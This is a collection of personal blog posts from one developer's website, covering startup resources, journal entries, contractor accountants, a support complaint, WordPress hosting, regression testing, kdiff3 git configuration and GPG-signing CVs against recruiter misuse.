* [The e-myth (revisited)](https://www.goodreads.com/book/show/81948.The_E_Myth_Revisited?ac=1&from_search=true)
* [A better mousetrap - the business of invention](https://www.amazon.co.uk/Better-Mousetrap-business-invention/dp/0951385607)
* [The Art of the Start](https://www.goodreads.com/book/show/22835624-the-art-of-the-start-2-0)
* [Key person of influence](https://www.goodreads.com/book/show/23353984-key-person-of-influence-revised-edition?from_search=true)
* [So good they can't ignore you](https://www.goodreads.com/book/show/15789193-so-good-they-can-t-ignore-you)
More books over on [my goodreads profile](https://www.goodreads.com/user/show/50628592-tim-abell).
Some [more suggestions on the cocoon blog](https://cocoon.life/blog/6-must-read-business-books/)
## Inspiration
* <https://www.softwarebyrob.com/2015/03/26/the-stairstep-approach-to-bootstrapping/>
## Podcasts
1. Bootstrapped Web [[Website](http://bootstrappedweb.com)] [[Feed](http://bootstrappedweb.com/feed/podcast/)]
2. Marketing for Developers [[Website](http://devmarketing.xyz)] [[Feed](https://el2.convertkit-mail.com/c/68udv830zfouw6v3n/opfkhq/aHR0cDovL3NpbXBsZWNhc3QuY29tL3BvZGNhc3RzLzE0NDYvcnNz)]
3. <NAME> Presents [[Website](http://okdork.com/podcast)] [[Feed](http://noahkagan.libsyn.com/rss)]
4. Rogue Startups Podcast [[Website](https://roguestartups.com/)] [[Feed](https://roguestartups.com/feed/podcast)]
5. Startup Chat [[Website](http://wpcurve.com/category/podcast)] [[Feed](http://feeds.feedburner.com/StartupChat)]
6. Startups For the Rest of Us [[Website](http://www.startupsfortherestofus.com)] [[Feed](http://www.startupsfortherestofus.com/feed)]
7. The Art of Product [[Website](http://artofproductpodcast.com/)] [[Feed](http://artofproductpodcast.com/rss)]
8. The Indie Hackers Podcast: How Developers are Bootstrapping, Marketing, and Growing Their Online Businesses [[Website](https://indiehackers.com)] [[Feed](http://feeds.backtracks.fm/feeds/indiehackers/indiehackers/feed.xml)]
9. The Startup Chat with Steli and Hiten [[Website](https://thestartupchat.com)] [[Feed](https://thestartupchat.com/feed/podcast/)]
10. The Tim Ferriss Show [[Website](https://art19.com/shows/tim-ferriss-show)] [[Feed](https://rss.art19.com/tim-ferriss-show)]
11. Tropical MBA - Entrepreneurship, Travel, and Lifestyle [[Website](http://www.tropicalmba.com)] [[Feed](http://www.tropicalmba.com/feed/podcast/)]
12. Zen Founder: Startup. Family. Life. [[Website](https://zenfounder.com)] [[Feed](https://zenfounder.com/feed/podcast/)]
[My feed list](https://www.dropbox.com/sh/hamw2d24w4vk062/AACyN1-AfzYpGIoNMl4d9xjOa?dl=0) exported from AntennaPod
## Products
* [github-pages](https://pages.github.com/) - for hosting landing pages etc
* [logojoy.com](http://logojoy.com) - $65 automated and very good logo generator
* godaddy - for domains
## Education
* [http://tinymarketingwins.com/](http://tinymarketingwins.com/) - learn marketing even before you have anything to sell
* [https://designacademy.io/](https://designacademy.io/) - design for developers
* [https://www.ditchinghourly.com/](https://www.ditchinghourly.com/)
* <http://startupclass.samaltman.com/> - also on youtube & as a podcast:
<https://www.youtube.com/watch?v=CBYhVcO4WgI&list=PL5q_lef6zVkaTY_cT1k7qFNF2TidHCe-1>
## Community
* [Indie Hackers](https://www.indiehackers.com/)
## People
* [<NAME>](https://okdork.com/)
* [<NAME>](http://www.timferriss.com/)
* Courtland (Ind<NAME>ers)
* [<NAME>](https://twitter.com/laurium)
* <NAME> (Ditching Hourly)
<file_sep>---
title: "Swimming"
date: 2004-03-15
slashdot_url: https://slashdot.org/journal/65294/swimming
---
<p>Swim swim swim swim. Glug splutter. Pant pant. Swim swim swim.<br>Ouch.</p>
<p>Curry<nobr> </nobr>:)</p>
<file_sep>---
title: "Swimming"
date: 2003-12-23
slashdot_url: https://slashdot.org/journal/56056/swimming
---
<p>Yay! Personal best.<br>36 lengths in one hour. That's 900 metres.</p>
<file_sep>---
title: "read a book today - without leaving your chair"
date: 2005-11-18
slashdot_url: https://slashdot.org/journal/122411/read-a-book-today---without-leaving-your-chair
---
<p><NAME> is giving his latest book away, for nothing (no beers)!<br><a href="http://www.andrewsmcmeel.com/godsdebris/">http://www.andrewsmcmeel.com/godsdebris/</a></p>
<p>--</p>
<p>I know because he sent me his <a href="http://www.dilbert.com/comics/dilbert/dnrc/html/newsletter62.html">newsletter</a></p>
<file_sep>---
title: Finding a contractor accountants
layout: post
---
Boring but important, having an accountant firm to make sure the books are HMRC-proof is important.
I don't know why but I've found it hard to pick good ones, and harder than I expected to find, research and choose a firm.
## Things that you need to keep in mind
* Business insurance (professional indemnity etc), often bundled but needs to happen
* Accountancy software - some use their own but that makes moving firms harder, so I'd use something separate. Some accountants bundle the fee.
* Xero - works but not very useable, seems to be built around ye-olde accountancy practices rather than what's easy to use.
* FreeAgent - much more useable, good enough for a contracting business
* Company registration (if you're just starting), some accountants will do it for you, or you can [set a company up yourself](https://www.gov.uk/topic/company-registration-filing/starting-company)
## Things your accountants can/should do for you
* Submit yearly accounts to companies house
* Help you set tax efficient salary
* Make sure your accounts in freeagent are accurate
* Help you understand your P&L (profit and loss)
* Submit your vat returns, and help you make sure it's right
* Personal tax return prep (plus spouse), some charge extra
* Make sure you're claiming the correct expenses, notably home-office allowance
* Check your accounts are in line with current laws and tax laws.
## Additional services
Some also will do:
* Bundled FreeAgent subscription
* Company setup
* Umbrella company stuff
* IR35 assessment/protection
* IPSE membership
* Provide a registered address to use that's not your home, and forward any mail
* Business insurance
* Registered company address
## Contract accountant list & reviews
I've asked around my network and these are the ones I've gathered so far. I've put them in a table, added links to trustpilot reviews and made a note of current (at time of writing) review scores and counts to help decide.
* [Airtable of contract accountants](https://airtable.com/shrRhSa7ZFHt1o6Bx)
<iframe class="airtable-embed" src="https://airtable.com/embed/shr3L59pAzDxaDES4?backgroundColor=cyan&viewControls=on" frameborder="0" onmousewheel="" width="100%" height="533" style="background: transparent; border: 1px solid #ccc;"></iframe>
* [Asking on twitter](https://twitter.com/tim_abell/status/1591194541797040128)
* [Asking on LinkedIn](https://www.linkedin.com/posts/timabell_any-suggestions-for-a-better-accountancy-activity-6851550397241290752-JRBl/)
* [Asking on contractor LinkedIn group](https://www.linkedin.com/feed/update/urn:li:activity:6985724333893591042/)
<file_sep>---
layout: post
title: Tech support at its worst
date: '2008-01-30T18:51:00.001Z'
author: <NAME>
tags:
- mcts
- mcp
- review
- training
- microsoft
modified_time: '2008-06-02T15:06:04.721Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7104045740264013043
blogger_orig_url: https://timwise.blogspot.com/2008/01/tech-support-at-its-worst.html
---
As you may know, I'm working through a Microsoft e-learning course at the
moment. Having had a [few
problems](http://www.flickr.com/photo_zoom.gne?id=2206580619&size=o) with the
service I've been trying to extract some common sense from their support
services. Having failed to get anything vaguely helpful I thought I'd ask them
about who they were, and I think the following response really sums up the
level of idiocy I have encountered thus far.
When asked a simple direct question about who I was communicating with, the
response is either hilarious or depressing, I'm not sure which. It would seem
that before they can tell me where they are based, they need to know what
operating system I run, what version of flash I have, what my login is etc etc.
Talk about customer disservice. The finishing touch for me is the addition of
upbeat advertising added to a response to an evidently already irritated
customer.
Here are the last two messages for your entertainment (identifiers stripped out):
> -------- Original Message --------
> Subject: Re: MCP Ref: C ###### \ site broken. (########)
> Date: Thu, 24 Jan 2008 16:03:12 +0000
> From: Tim\<<EMAIL>>
> To: <EMAIL>\<<EMAIL>>
>
>
> I have a couple of questions for you:
>
> What company are you directly employed by?
> Where are you based?
>
> Thanks
>
> Tim
The highly considered response:
> -------- Original Message --------
> Subject: MCP Ref: C ##### \ site broken. (#######################)
> Date: Wed, 30 Jan 2008 15:59:21 +0100 (CET)
> From: <EMAIL>\<<EMAIL>>
> To: Tim\<<EMAIL>>
>
>
> Hello Tim,
>
> Thank you for contacting Learning Manager Support.
>
> In order for us to process this request, we need the following
> information from you:
>
> - Step by step screen shots of the entire process including the error
> message
>
> - Your log in Live ID and the Unique ID associated to it.
>
> To obtain your Unique ID, please follow the steps provided:
>
> 1) Visit http://account.live.com
>
> 2) Sign in using your passport account.
>
> 3) After singing in you will see a page with more options. Please click
> on 'Registered information'
>
> 4) At the bottom of this page you will see your Unique ID. It will look
> like this: '000XXXXXXXXXXXXX'
>
> - Detailed description of what the problem/issue is that you are
> experiencing.
>
> - What is the Operating System that you are using?
>
> - What is the Internet Browser and version that you are using?
>
> - What version of Flash and Shockwave are you using?
>
> - Screenshot of the following webpage: https://learning.microsoft.com/Commerce/PurchaseHistory.aspx
>
>
> While some of the above information may not seem applicable to your
> issue, it is important that we must receive them in order to best
> resolve your issue.
>
> Please also note that we unfortunately are not allowed to provide you
> any information about our location.
>
> Looking forward to receiving your reply.
>
> Kind Regards
>
> <NAME>
>
> Microsoft Regional Service Center
> E-Mail: <EMAIL>
> Tel.: 0800-9170758 or 0800 0960137
> Fax: ++49 5 24 11 79 60 77
>
> In order to keep up to date with the MCP/ MCT program your contact
> details need to be correct.
>
> Don´t forget: You can update your contact details yourself in the
> Profile Editor on the MCP/ MCT Secure Site at ...
>
> NOW AVAILABLE: Virtual PC-enabled Labs in Official Microsoft Learning
> Products https://partnering.one.microsoft.com/mct/vpc/default.aspx
>
> Microsoft highly recommends that users with Internet access update their
> Microsoft software to protect against viruses and security
> vulnerabilities. The easiest way to do this is to visit the following
> website: http://www.Microsoft.com/protect
It's worth noting that this is totally consistent with the level of service I
have experienced with Microsoft e-learning. As far as I can fathom, the
e-learning system has been set up on a pile of servers and then been left to
rot whilst paying customers are fobbed off by a nameless and faceless 3rd
party. It may be profitable in the short term, but this kind of behaviour may
well be the cracks in the foundations of Microsoft's empire. I for one am
certainly plotting a course for fairer pastures.
<file_sep>---
layout: post
title: Choosing wordpress hosting for a new idea
date: 2017-10-22 11:32:08.000000000 +01:00
type: post
permalink: "/2017/10/22/choosing-wordpress-hosting-for-a-new-idea/"
---
I need somewhere to keep the marketing site/content for my new [Sql Data Viewer](https://sqldataviewer.com/) product. (Since renamed to [SQL Schema Explorer](https://timabell.github.io/schema-explorer/).
I could use [github pages](https://pages.github.com/) or something similar, but I've found the overhead of needing a dev environment to make any change puts me off getting things done. I've been using wordpress.com for this blog and am pretty happy, especially having a mobile app. I've also heard using wordpress makes it easier to outsource content/design if you have enough success to make that worthwhile.
I don't fancy maintenance, security patching and backup, so the marketing site is currently on **[wordpress.com](https://wordpress.com/)** where I've paid for the "personal" plan at **£3/month** to remove ads and the **£0.92/month** for mapping a domain. Affordable for contactor running a shot-in-the-dark startup side-project that may never make a penny. Note that you only get their built in analytics, you can't add google analytics, and you can't install plugins on that plan.
* To get google analytics you need "premium" at £7/month
* To be able to add plugins you need "business" at £20/month
This is on top of the **£1.15/month** for domain registration and **£10/month** for a VPS (virtual private server) to run my demo site from, both from the excellent [bytemark](https://www.bytemark.co.uk/) hosting company, who've been fab on support from day one.
Just for completeness: the demo site connects to sql azure instances are easily within the $40/month included with my MSDN Professional subscription that I use for contracting. Handy.
I've been listening to lots of startup podcasts ([email me](mailto:<EMAIL>?subject=startup-podcasts&body=send-me-your-opml!) if you want the list), and have discovered the mighty [<NAME>](https://justinjackson.ca/) and his excellent [Marketing for Developers](https://devmarketing.xyz/) content - I recommend you buy it if you're a developer thinking of selling a product / service. I'm now working through trying to apply the lessons in the book to my own product. I got to the analytics bit and hit a wall. Wordpress.com (the wordpress hosting site, not the software itself) force you to upgrade to the business plan at **£20.83/month**. Given I don't know how long this is going to take me I'm not keen to start ramping up costs to that extent with no obvious route to a return on the investment.
I've looked at the three recommended in Justin's book (plus more added more recently), and the starting prices are:
* [Siteground](https://www.siteground.co.uk/wordpress-hosting.htm): Startup plan (like it!) **£2.75/month** - looks like this might be a winner then! Oh wait, that's a sign-up discount, it's actually **£6.95/month**. Hrumph.
* [Krystal](https://krystal.uk/wordpress-hosting): Personal **£18/month**
* [WPEngine](https://wpengine.com/plans/): Personal $29/month - about **£22/month**.
* [Pagely](https://pagely.com/plans-pricing/): VPS-1 $499/month - about **£380/month** - ouch! I don't think I'm their target market. I wonder if they repriced, perhaps Justin should drop this one from the book.
And that's where I'm at right now. Maybe I'll just shove a docker wordpress image on the VPS, it's already a docker host. I need to figure out hosting multiple sites on one IP for the demos anyway. But then again, I don't want to be a wordpress sys-admin. Or maybe I'll rethink the static site thing.
<file_sep>---
layout: post
title: xsession sold out
date: '2007-11-04T13:59:00.000Z'
author: <NAME>
tags:
- hosting
modified_time: '2007-11-04T14:03:58.488Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2194756533997655349
blogger_orig_url: https://timwise.blogspot.com/2007/11/xsession-sold-out.html
---
My web host [xsession](http://xsession.com/) has been bought by [namesco](http://www.names.co.uk/), and promptly put domain renewal prices up from £8 to £17\. Time for a new web host.
<file_sep>---
layout: page
title: Payment successful, thanks!
---
Thanks for buying the GTD Trello template.
## To use the template
1. Go to [the GTD Trello template](https://trello.com/b/4L9ezgRP/gtd/timabell2/recommend)
2. Sign up to trello (or sign in)
3. Click "Create Board from Template"
Happy GTDing! I really hope it brings reduced stress to your life.
## Pay it forward
Please help spread the word by sharing [my GTD page](https://timwise.co.uk/2020/09/15/effective-gtd-with-trello/) with your friends, colleagues and on social media. [Here's a tweet to share](https://twitter.com/intent/tweet?text=I%20just%20bought%20Tim%27s%20GTD%20template.%20%3D%3D%3E%20Read%20this%3A%20%22Effective%20GTD%20with%20Trello%22%20by%20%40tim_abell%20https%3A%2F%2Ftimwise.co.uk%2F2020%2F09%2F15%2Feffective-gtd-with-trello%2F%20).
## Support
Any problems get in touch <<EMAIL>>
<file_sep>---
title: "Offline friends"
date: 2004-10-15
slashdot_url: https://slashdot.org/journal/87059/offline-friends
---
<p>Judging by the<nobr> </nobr>/. friends list it looks like I'm failing to persuade people to live online.</p>
<p>Oh well maybe I'll just move back into the real world. Good effort mr tom, nothing new today though?</p>
<p>Tim</p>
<file_sep>---
title: "Photos"
date: 2004-05-13
slashdot_url: https://slashdot.org/journal/71345/photos
---
<p>A friend just put me on to a rather nifty image hosting service called <a href="http://www.photobucket.com/">Photo bucket</a>.<br>I got a registration to have a look round. You can see what I get up to on <a href="http://img66.photobucket.com/albums/v202/tim_abell/">my album</a> page. The service resizes images for you which is handy for the non technically minded of us.</p>
<p>Not that I need it given that I pay for web space.</p>
<file_sep>---
title: "more stats!"
date: 2004-09-15
slashdot_url: https://slashdot.org/journal/83798/more-stats
---
<p>Result! My sites been up long enough to get uptime stats from netcraft. That makes me happy.<br><a href="http://uptime.netcraft.com/up/graph?site=www.timwise.co.uk">http://uptime.netcraft.com/up/graph?site=www.timwise.co.uk</a><br></lunchbreak></p>
<file_sep>---
layout: post
title: Regression Tests for ASP.NET / SQL Projects
date: 2018-03-13 15:25:46.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '15685724070'
timeline_notification: '1520954747'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/03/13/regression-tests-for-asp-net-sql-projects/"
---
I've had the opportunity to attempt many variations of regression testing on many projects.
Many of the systems I've worked on have at least some level of workflow, meaning a user has to move through many steps as the system progresses something towards a final state.
As systems become more and more complex it becomes harder to not accidentally break an area of the system you weren't currently looking at and didn't re-test manually before shipping. Hence the search for the holy grail of the perfect regression test suite. It turns out that none of the approaches available (unit tests, UI drivers etc.) provide a single solution to the problem, and instead we have to use all these approaches in balance to give reasonable protection against regressions.
Here I lay out my current thinking on the best way to use testing to avoid regressions in a standard ASP.NET MVC + SQL Server project. I would like to introduce to you the idea of "business logic tests" which are an integration test suite starting below the UI layer, continuing through to a real database. I believe this gives an ideal balance of the trade-offs we have to make when choosing how to design out full regression test suite for a system.
## System layers
The layers of such a system are ideally something like this:
* Database (largely just used for CRUD storage)
* ORM - EF or similar library
* Model - C# classes
* Business logic layer - pure C# - (often missing in real projects, with business logic scattered across the other layers)
* UI layer - Controller classes written in C#, views in razor .cshtml files, html, css, javascript etc.
## Recommended test layers
* **Unit tests** - test small pieces of C# code
* **Business logic tests** - test the business logic layer down through to a real SQL Server database.
* **UI Smoke tests** - non-exhaustive test of a few common user journey's through, running against a real database, driven with Selenium Web Driver or similar.
There should be only a few smoke tests, there should be many business logic tests covering all business functions that need to stay working, and finally developer discretion on the amount of unit testing to apply at the lowest level.
## What do the business logic tests look like?
These could be pure code driven through something like NUnit, or they could be in business language through a BDD tool like specflow.
They depend on the business logic project but nothing above that (UI). They inject a real database connection as a dependency through whatever injection method you use.
These tests should make sense to the product owner / client.
This is the layer with the broadest coverage of all of the three styles in play. Every business use-case, workflow & variation should be covered here. This is the suite that will alert you if any business or workflow rule is no longer being applied as designed, or if an obscure step of an obscure branch of your workflow has stopped working (perhaps due to an odd interaction with a database constraint).
## Handling the database
SQL Sever has a very useful snapshot feature that means you can very rapidly roll back to a clean state after each test run. ([Snapshot setup script](https://gist.github.com/timabell/3164291#file-create-snapshot-sql))
For each business logic test run:
1. [Reset to the production snapshot](https://gist.github.com/timabell/3164291#file-reset-to-snapshot-sql) (or production equivalent build if you can't actually grab a production backup)
2. Run outstanding migrations for this version of the code (you are using [Octopus + ReadyRoll](https://documentation.red-gate.com/rr1/deployment/octopus-deploy) aren't you?)
3. Run the Business logic tests.
## Why not test all the business functions through the UI?
* UI tests are prone to reliability problems, you can end up with 98% pass rates being normal, so then you don't notice when a critical test fails.
* UI tests are slow - this can add an extra overhead to developer productivity.
* UI tests cause unwarranted resistance to change - once you have UI tests the UI becomes extremely hard to change, particularly for sweeping site-wide redesigns without spending a prohibitively long time fixing up the test suite. And you aren't fixing the test suite because you changed the logic, this is busywork.
* The UI isn't sufficiently fragile to warrant this level of testing - when you are working on a page you are unlikely to break unrelated pages without realising.
I have seen first-hand a team of excellent programmers get bogged down in problems with a full regression test suite driven entirely from the UI.
## Why not test all layers separately?
In my experience a major point of fragility when a system is modified is the interaction between the code and the database. As such it's important that this fault-line is covered thoroughly by all regression tests that focus on business functions that need to remain functional.
A test suite that isolates the business logic layer from the database layer provides very little value, usually just fulfilling a "_though shalt unit test all classes_" declaration.
## How to get there
If you don't have a solid business logic layer then you will need to refactor your way to that goal. This has other benefits for reliability beyond the ability to test. Clean code with an obvious layer for all the business logic is easier to modify and keep defect-free.
## Bonus - free test data
The tests that you write to drive the business logic layer will be generating real data in a real copy of your database as it runs through the many steps in a workflow. You can use this test driver to generate useful test data for every step in a workflow, e.g. if a workflow had four steps you could do the following:
1. Test account A - drive business logic to step 1
2. Test account B - drive business logic to step 2
3. Test account C - drive business logic to step 3
4. Test account D - drive business logic to step 4
This is extremely quick to run, and now you have an account in every state of your workflow. This is useful for easily:
* Demoing your system from any starting point with multiple test accounts.
* Having the data in the right state to do development work on state 4 without having to manually set it up.
* Give your manual testers all the test accounts they need in many interesting states.
* Testing out your reporting systems and anything else that consumes data from your database.
Having realised you can do this, why would you ever do it manually again?
Because the code that generates this data is a core part of your regression test suite it will be maintained as part of normal development activities and so you'll never again have to deal with test data that no longer works with your latest version of the system.
* * *
If you want me to help you get to this ideal then drop me a line - [<EMAIL>](mailto:<EMAIL>)
<file_sep>---
title: "This is a local village"
date: 2004-06-14
slashdot_url: https://slashdot.org/journal/74396/this-is-a-local-village
---
<p>Heard today that my x is now engaged to fb. Had it rubbed in my face as usual.</p>
<p>Oh well.</p>
<p>Good luck to them. I guess.</p>
<file_sep>---
title: "Urgh. Not such a toothy grin now."
date: 2004-11-12
slashdot_url: https://slashdot.org/journal/90179/urgh-not-such-a-toothy-grin-now
---
<p>Had two bottom wisdom teeth extracted on Tuesday and am still recovering. Don't think I'll post a pic, wouldn't want to scare the children! Thanks to my friends in reading for looking after me while I was woozy! Back to my soup now.</p>
<p>I've just booked tickets for this <a href="http://www.delicatessen-reading.org.uk/"><NAME></a>. Let me know if your gonna come too (£10).</p>
<p>xx</p>
<file_sep>---
layout: post
title: Sql Data Viewer - preview release
date: '2015-10-27T14:45:00.000Z'
author: <NAME>
tags:
modified_time: '2015-10-27T14:45:10.514Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1811864781113378864
blogger_orig_url: https://timwise.blogspot.com/2015/10/sql-data-viewer-preview-release.html
---
Hello dear readers,
I've started working on a data brower for relational databases that allows you to click through ids with foreign-keys to get around.
Take a look at [http://www.timwise.co.uk/sdv/](http://www.timwise.co.uk/sdv/) and if you think you might be interested then please do sign up to my [mailing list](http://eepurl.com/bDGPjf), and let me know if you have any feedback.
This started as a holiday exercise in learning google's go programming language, but is intended to become a fully-fledged software product available to buy.
Tim
<file_sep>---
layout: post
title: configuring kdiff3 as a mergetool in msysgit
date: '2010-09-03T08:31:00.004Z'
author: <NAME>
tags:
- windows
- git
- kdiff3
modified_time: '2011-01-14T11:56:40.103Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-362080553431078830
blogger_orig_url: https://timwise.blogspot.com/2010/09/configuring-kdiff3-as-mergetool-in.html
---
How to configure kdiff3 as a mergetool in msysgit. (I think if you install kdiff3 *before* msysgit it is picked up automatically, if not, do the following after installing both).
In git bash:
git config --global merge.tool kdiff3git config --global mergetool.kdiff3.path "c:\Program Files\KDiff3\kdiff3.exe"
double check:
cat ~/.gitconfig[merge] tool = kdiff3[mergetool "kdiff3"] path = c:\\Program Files\\KDiff3\\kdiff3.exe
refs:
* [http://markmail.org/message/dvrnn7ilprvinrfp#query:msysgit%20kdiff3%20.gitconfig+page:1+mid:dvrnn7ilprvinrfp+state:results](http://markmail.org/message/dvrnn7ilprvinrfp#query:msysgit%20kdiff3%20.gitconfig+page:1+mid:dvrnn7ilprvinrfp+state:results)
* [http://www.kernel.org/pub/software/scm/git/docs/git-config.html](http://www.kernel.org/pub/software/scm/git/docs/git-config.html)
Under cygwin, the setup would be:
git config --global merge.tool kdiff3git config --global mergetool.kdiff3.path /cygdrive/c/Program\ Files\ \(x86\)/KDiff3/kdiff3.exe
Giving the config file contents:
[merge] tool = kdiff3[mergetool "kdiff3"] path = /cygdrive/c/Program Files (x86)/KDiff3/kdiff3.exe
Which by the way you can view with
git config -e --global
<file_sep>---
layout: page
title: Recruiters
permalink: /recruiters/
redirect_from: /2015/10/28/dealing-with-dodgy-recruiter-tactics/
---
While many recruiters try and be reasonable, there are enough out there using
[underhand
tactics](http://www.brandonsavage.net/why-recruiters-are-bad-for-your-career/)
to make life difficult and potentially jeopardise a good contract.
The tactics addressed below are:
1. "Multiple submission". This is where you end up with your CV landing on a client's desk from **two** different recruitment companies. I gather this can be the nail in the coffin of a contract even if the client was keen - who wants to be stuck in the middle of two recruiters fighting over the commission?!
2. Requiring "references" that are actually just lead generation.
# Multiple submission
## Principles
The first step is simple, which is **never agree verbally or otherwise to be
put forward without first finding out who the client is**, and make sure you
keep track of who sent your CV where. I find
[Trello](https://trello.com/timabell2/recommend) is a good tool for keeping on
top of the fast moving and often fragmented information you get when hunting
for contracts, particularly combining web view with the mobile apps for on-the
go access to the information.
Recruiters are often hesitant to pass on the client's name, and this is
understandable as if you were to go round them then they'd lose their
commission which is how they earn a living. Worse, if you let the name slip to
another less scrupulous recruiter then they may try and get your CV in first
themselves without asking and in doing so sour the deal for everyone. (They
often fish for names with phrases like "*I need to know who else you've been
submitted to in order to avoid duplication*" - this is a lie, you can manage
this fine yourself.)
To tackle this I recommend the following:
* Never share their client's name with anyone else, especially other
recruiters; make it clear this is a point of principle.
* Prove your integrity by politely refusing to tell recruiters who ask, they
might have liked the name, but they will be more likely to trust you in the
future for respecting the wishes of other recruiters.
So that's the easy bit which I've been doing for some time...
<div style="text-align: center">
<a href="https://www.flickr.com/photos/tim_abell/21013910269/" target="_blank" rel="noopener"><img title="" src="https://c2.staticflickr.com/6/5769/21013910269_433c52303f.jpg" alt="Picture of an otter's head poking up in the sea." width="320" height="192" border="0" /></a>
</div>
## Technical measures
There are unfortunately a bunch of particularly unscrupulous recruiters out
there like sharks in the water who will without your permission, or possibly
without ever contacting you, send your CV to their "client" (or just some poor
manager they've found to spam with CVs). You can't tell them not to if they've
never asked you, and it can still ruin a deal. So what to do about that?
If you're looking for contract work, you really need good exposure, so having
your CV all over the place like leaves in the wind is not a bad way of getting
the word out there (bear in mind I'm looking for work for my contracting
company, which is a different ball-game to finding that perfect permanent
role). It's actually pretty hard to control at all if you're dealing with
recruiters because as soon as you include your CV in a response to posting on
[JobServe](http://www.jobserve.com/) it'll be dropped straight into that
recruiter's pool of CVs, and some recruiters even pool CVs between them using
services like [iProfileUK](http://www.iprofileuk.com/).
To prevent that free-wheeling CV being used without permission, it contains the
following text (as does [my LinkedIn
profile](https://www.linkedin.com/in/timabell)):
> Recruiters: this CV is not authorised for distribution to your clients.
> Please contact me for permission to represent me and for a separate copy
> containing an authorisation code & gpg signature. Thanks. To prospective
> clients, if you receive my CV without these then I haven't given permission
> to be represented.
Okay, so far so good, but any unscrupulous recruiter could just strip that out
and send it anyway, and how would I be able to make a client comfortable that
they can tell this scumbag to jog on?
So before I agree to be represented by a particular recruiter to a particular
client (which I have no particular objection to if they've found work I
otherwise couldn't have found), I will be needing the client's name. I will add
this to a list of who has authorization to send my CV and who they are
authorized to send it to. I will then generate a customised CV (via mail merge)
with explicit permission to represent me to this specific client included in
it, and a note that any CVs received without this are unauthorized by me.
To prevent a recruiter cottoning on and just generating this themselves I will
then be [GPG](https://gnupg.org/) signing the result, which can then be checked
against my public key, proving that it did indeed come from me (assuming my pc
hasn't been hacked of course but I haven't heard of any recruiters going that
far, if they could they'd probably be security consultants instead of
recruiters!).
## Technical details
### Auth codes
These in a way are redundant, but they are easier for the average person to check, and they add air of authority to the whole thing to help discourage those who would behave in bad faith.
Using libreoffice calc, codes are generated with the following:
A cell containing allowable characters in the codes as text: `0123ABCDEF` etc
for this example this is in cell `F1`.
A row for each authorized representation containing this formula to generate a
unique authorisation code: `=CONCATENATE(MID($F$1,RANDBETWEEN(1,LEN($F$1)),1)`,
[repeat the "mid" clause once for each digit of the code to be generated] )
### Generating auth text
There's another concatenation cell to generate the message to add to the CV.
This is auth text is then copy-pasted into a file, and signed with gnupg on the command-line of my linux box.
### Signing
Here you can see the signing happening, followed by verification that the file is signed properly (as the client might do if they suspect a recruiter is reusing my CV for without my permission).
```bash
gpg --clearsign authorization.txt
```
the contents of the signed file (output to `authorization.txt.asc`) is then copy-pasted onto the end of a CV and
sent off to the recruiter to relay to their client. Along with a custom header with the client & recruiter name to make it absolutely clear who it's solely intended for.
### Verifying
```bash
gpg --verify authorization.txt.asc
gpg: Signature made Fri 07 Apr 2023 10:31:36 BST
gpg: using RSA key 74D42A4C905507C54A7E3C9C26C6E08728CDF8EA
gpg: Good signature from "<NAME> <<EMAIL>>" [ultimate]
```
The important bit here is "Good signature".
If you haven't told gpg to trust my key then you'll get a stern warning from gpg, but it still checks the signature. GPG (and PGP) do more than just sign files, they have a web-of-trust system that involves showing up in the real world with passports and signing each other's keys. You can see why that hasn't gone mainstream, but it is very good.
See <https://yanhan.github.io/posts/2014-03-04-gpg-how-to-trust-imported-key/> for how to mark keys as trusted.
#### My public key
My current public key `28CD F8EA` for `<EMAIL>`.
You can obtain the key for verifying from:
* My website: [public-key.txt](/public-key.txt)
* [keyserver.ubuntu.com](http://keyserver.ubuntu.com/pks/lookup?search=tim%40timwise.co.uk&fingerprint=on&op=index) (synchronised with other key servers)
* [keys.opengpg.org](https://keys.openpgp.org/search?q=<EMAIL>)
Full primary key fingerprint: `74D4 2A4C 9055 07C5 4A7E 3C9C 26C6 E087 28CD F8EA`.
Learn more about the state of sharing gpg keys: <https://superuser.com/questions/227991/where-to-upload-pgp-public-key-are-keyservers-still-surviving>
### Examples
I've uploaded a couple of files for you to try out verifying, one with the
original message, and one with a forged message where the client's name has
been changed. See if you can figure out which is which:
* [authorization1](/assets/authorization-1.txt.asc)
* [authorization2](/assets/authorization-2.txt.asc)
### Limiting the period of right to represent
It occurred to me more recently that there should be a time limit of say 3 months on the permission for a recruiter to represent you. As such my permission message currently reads:
> "<NAME> has given permission for ExampleRecruiter to pass on this CV to ExampleClient on 22 Jan 2022; auth code Q5GAYUEEH5. Any copies of my CV received without a valid gpg signature have not been authorized for distribution. Any express or implied right to represent will expire on 22 Apr 2022 Learn more: https://timwise.co.uk/recruiters "
# Requests for "References"
Unfortunately the more unscrupulous recruiters will claim they need "references" pretty much on first contact before even making contact with the client for you. References should be a follow-up cross check once fit is agreed on. In the worst case these are no such thing, and are actually just mining you for contact details of potential new business that they can harass to find openings and contacts for their database. Worst case they will then spam that contact with unsolicited CVs in a hope of gaining an unearned commission. You owe it to your closest contacts (those who would do you the favour of writing a reference) to protect them from such approaches from the wild-west of the recruitment industry. They doubtless get enough fo this cold outreach without you allowing more of it. Worse they might even use your name without permission to try and gain credence with your contact.
Defenses:
1. Don't ever give out "reference" details until you know for certain that the end client has specifically requested them.
2. Provide them only to the end client, not the recruitment firm.
3. Provide them explicitly for the specific purpose fo reference checking, and forbid their use for any other purpose. Cite breach of GDPR.
It's also important that you check with your contact that they are happy to be a reference for you and that they will be expecting contact from whichever recruiter or client you are in talks with. This way if your name or contact is spammed or abused by this firm then you will both know it has happened.
Do not allow yourself to be pressured into providing references inappropriately, early or carelessly on pain of losing a deal. With the shadiest of recruitment companies the deal may not even exist and may just be made up for the purpose of attracting CVs and filling in their database of prospects to spam.
<file_sep>---
title: "unblocked!"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106732/unblocked
---
<p>finally, I can post messages from home,<nobr> </nobr>/. have finally removed the block on nthell's proxy.</p>
<p>more posts will now follow.</p>
<p>In the mean time, have you seen my bookmarks?<br><a href="http://www.timwise.co.uk/">timwise.co.uk</a> > bookmarks.</p>
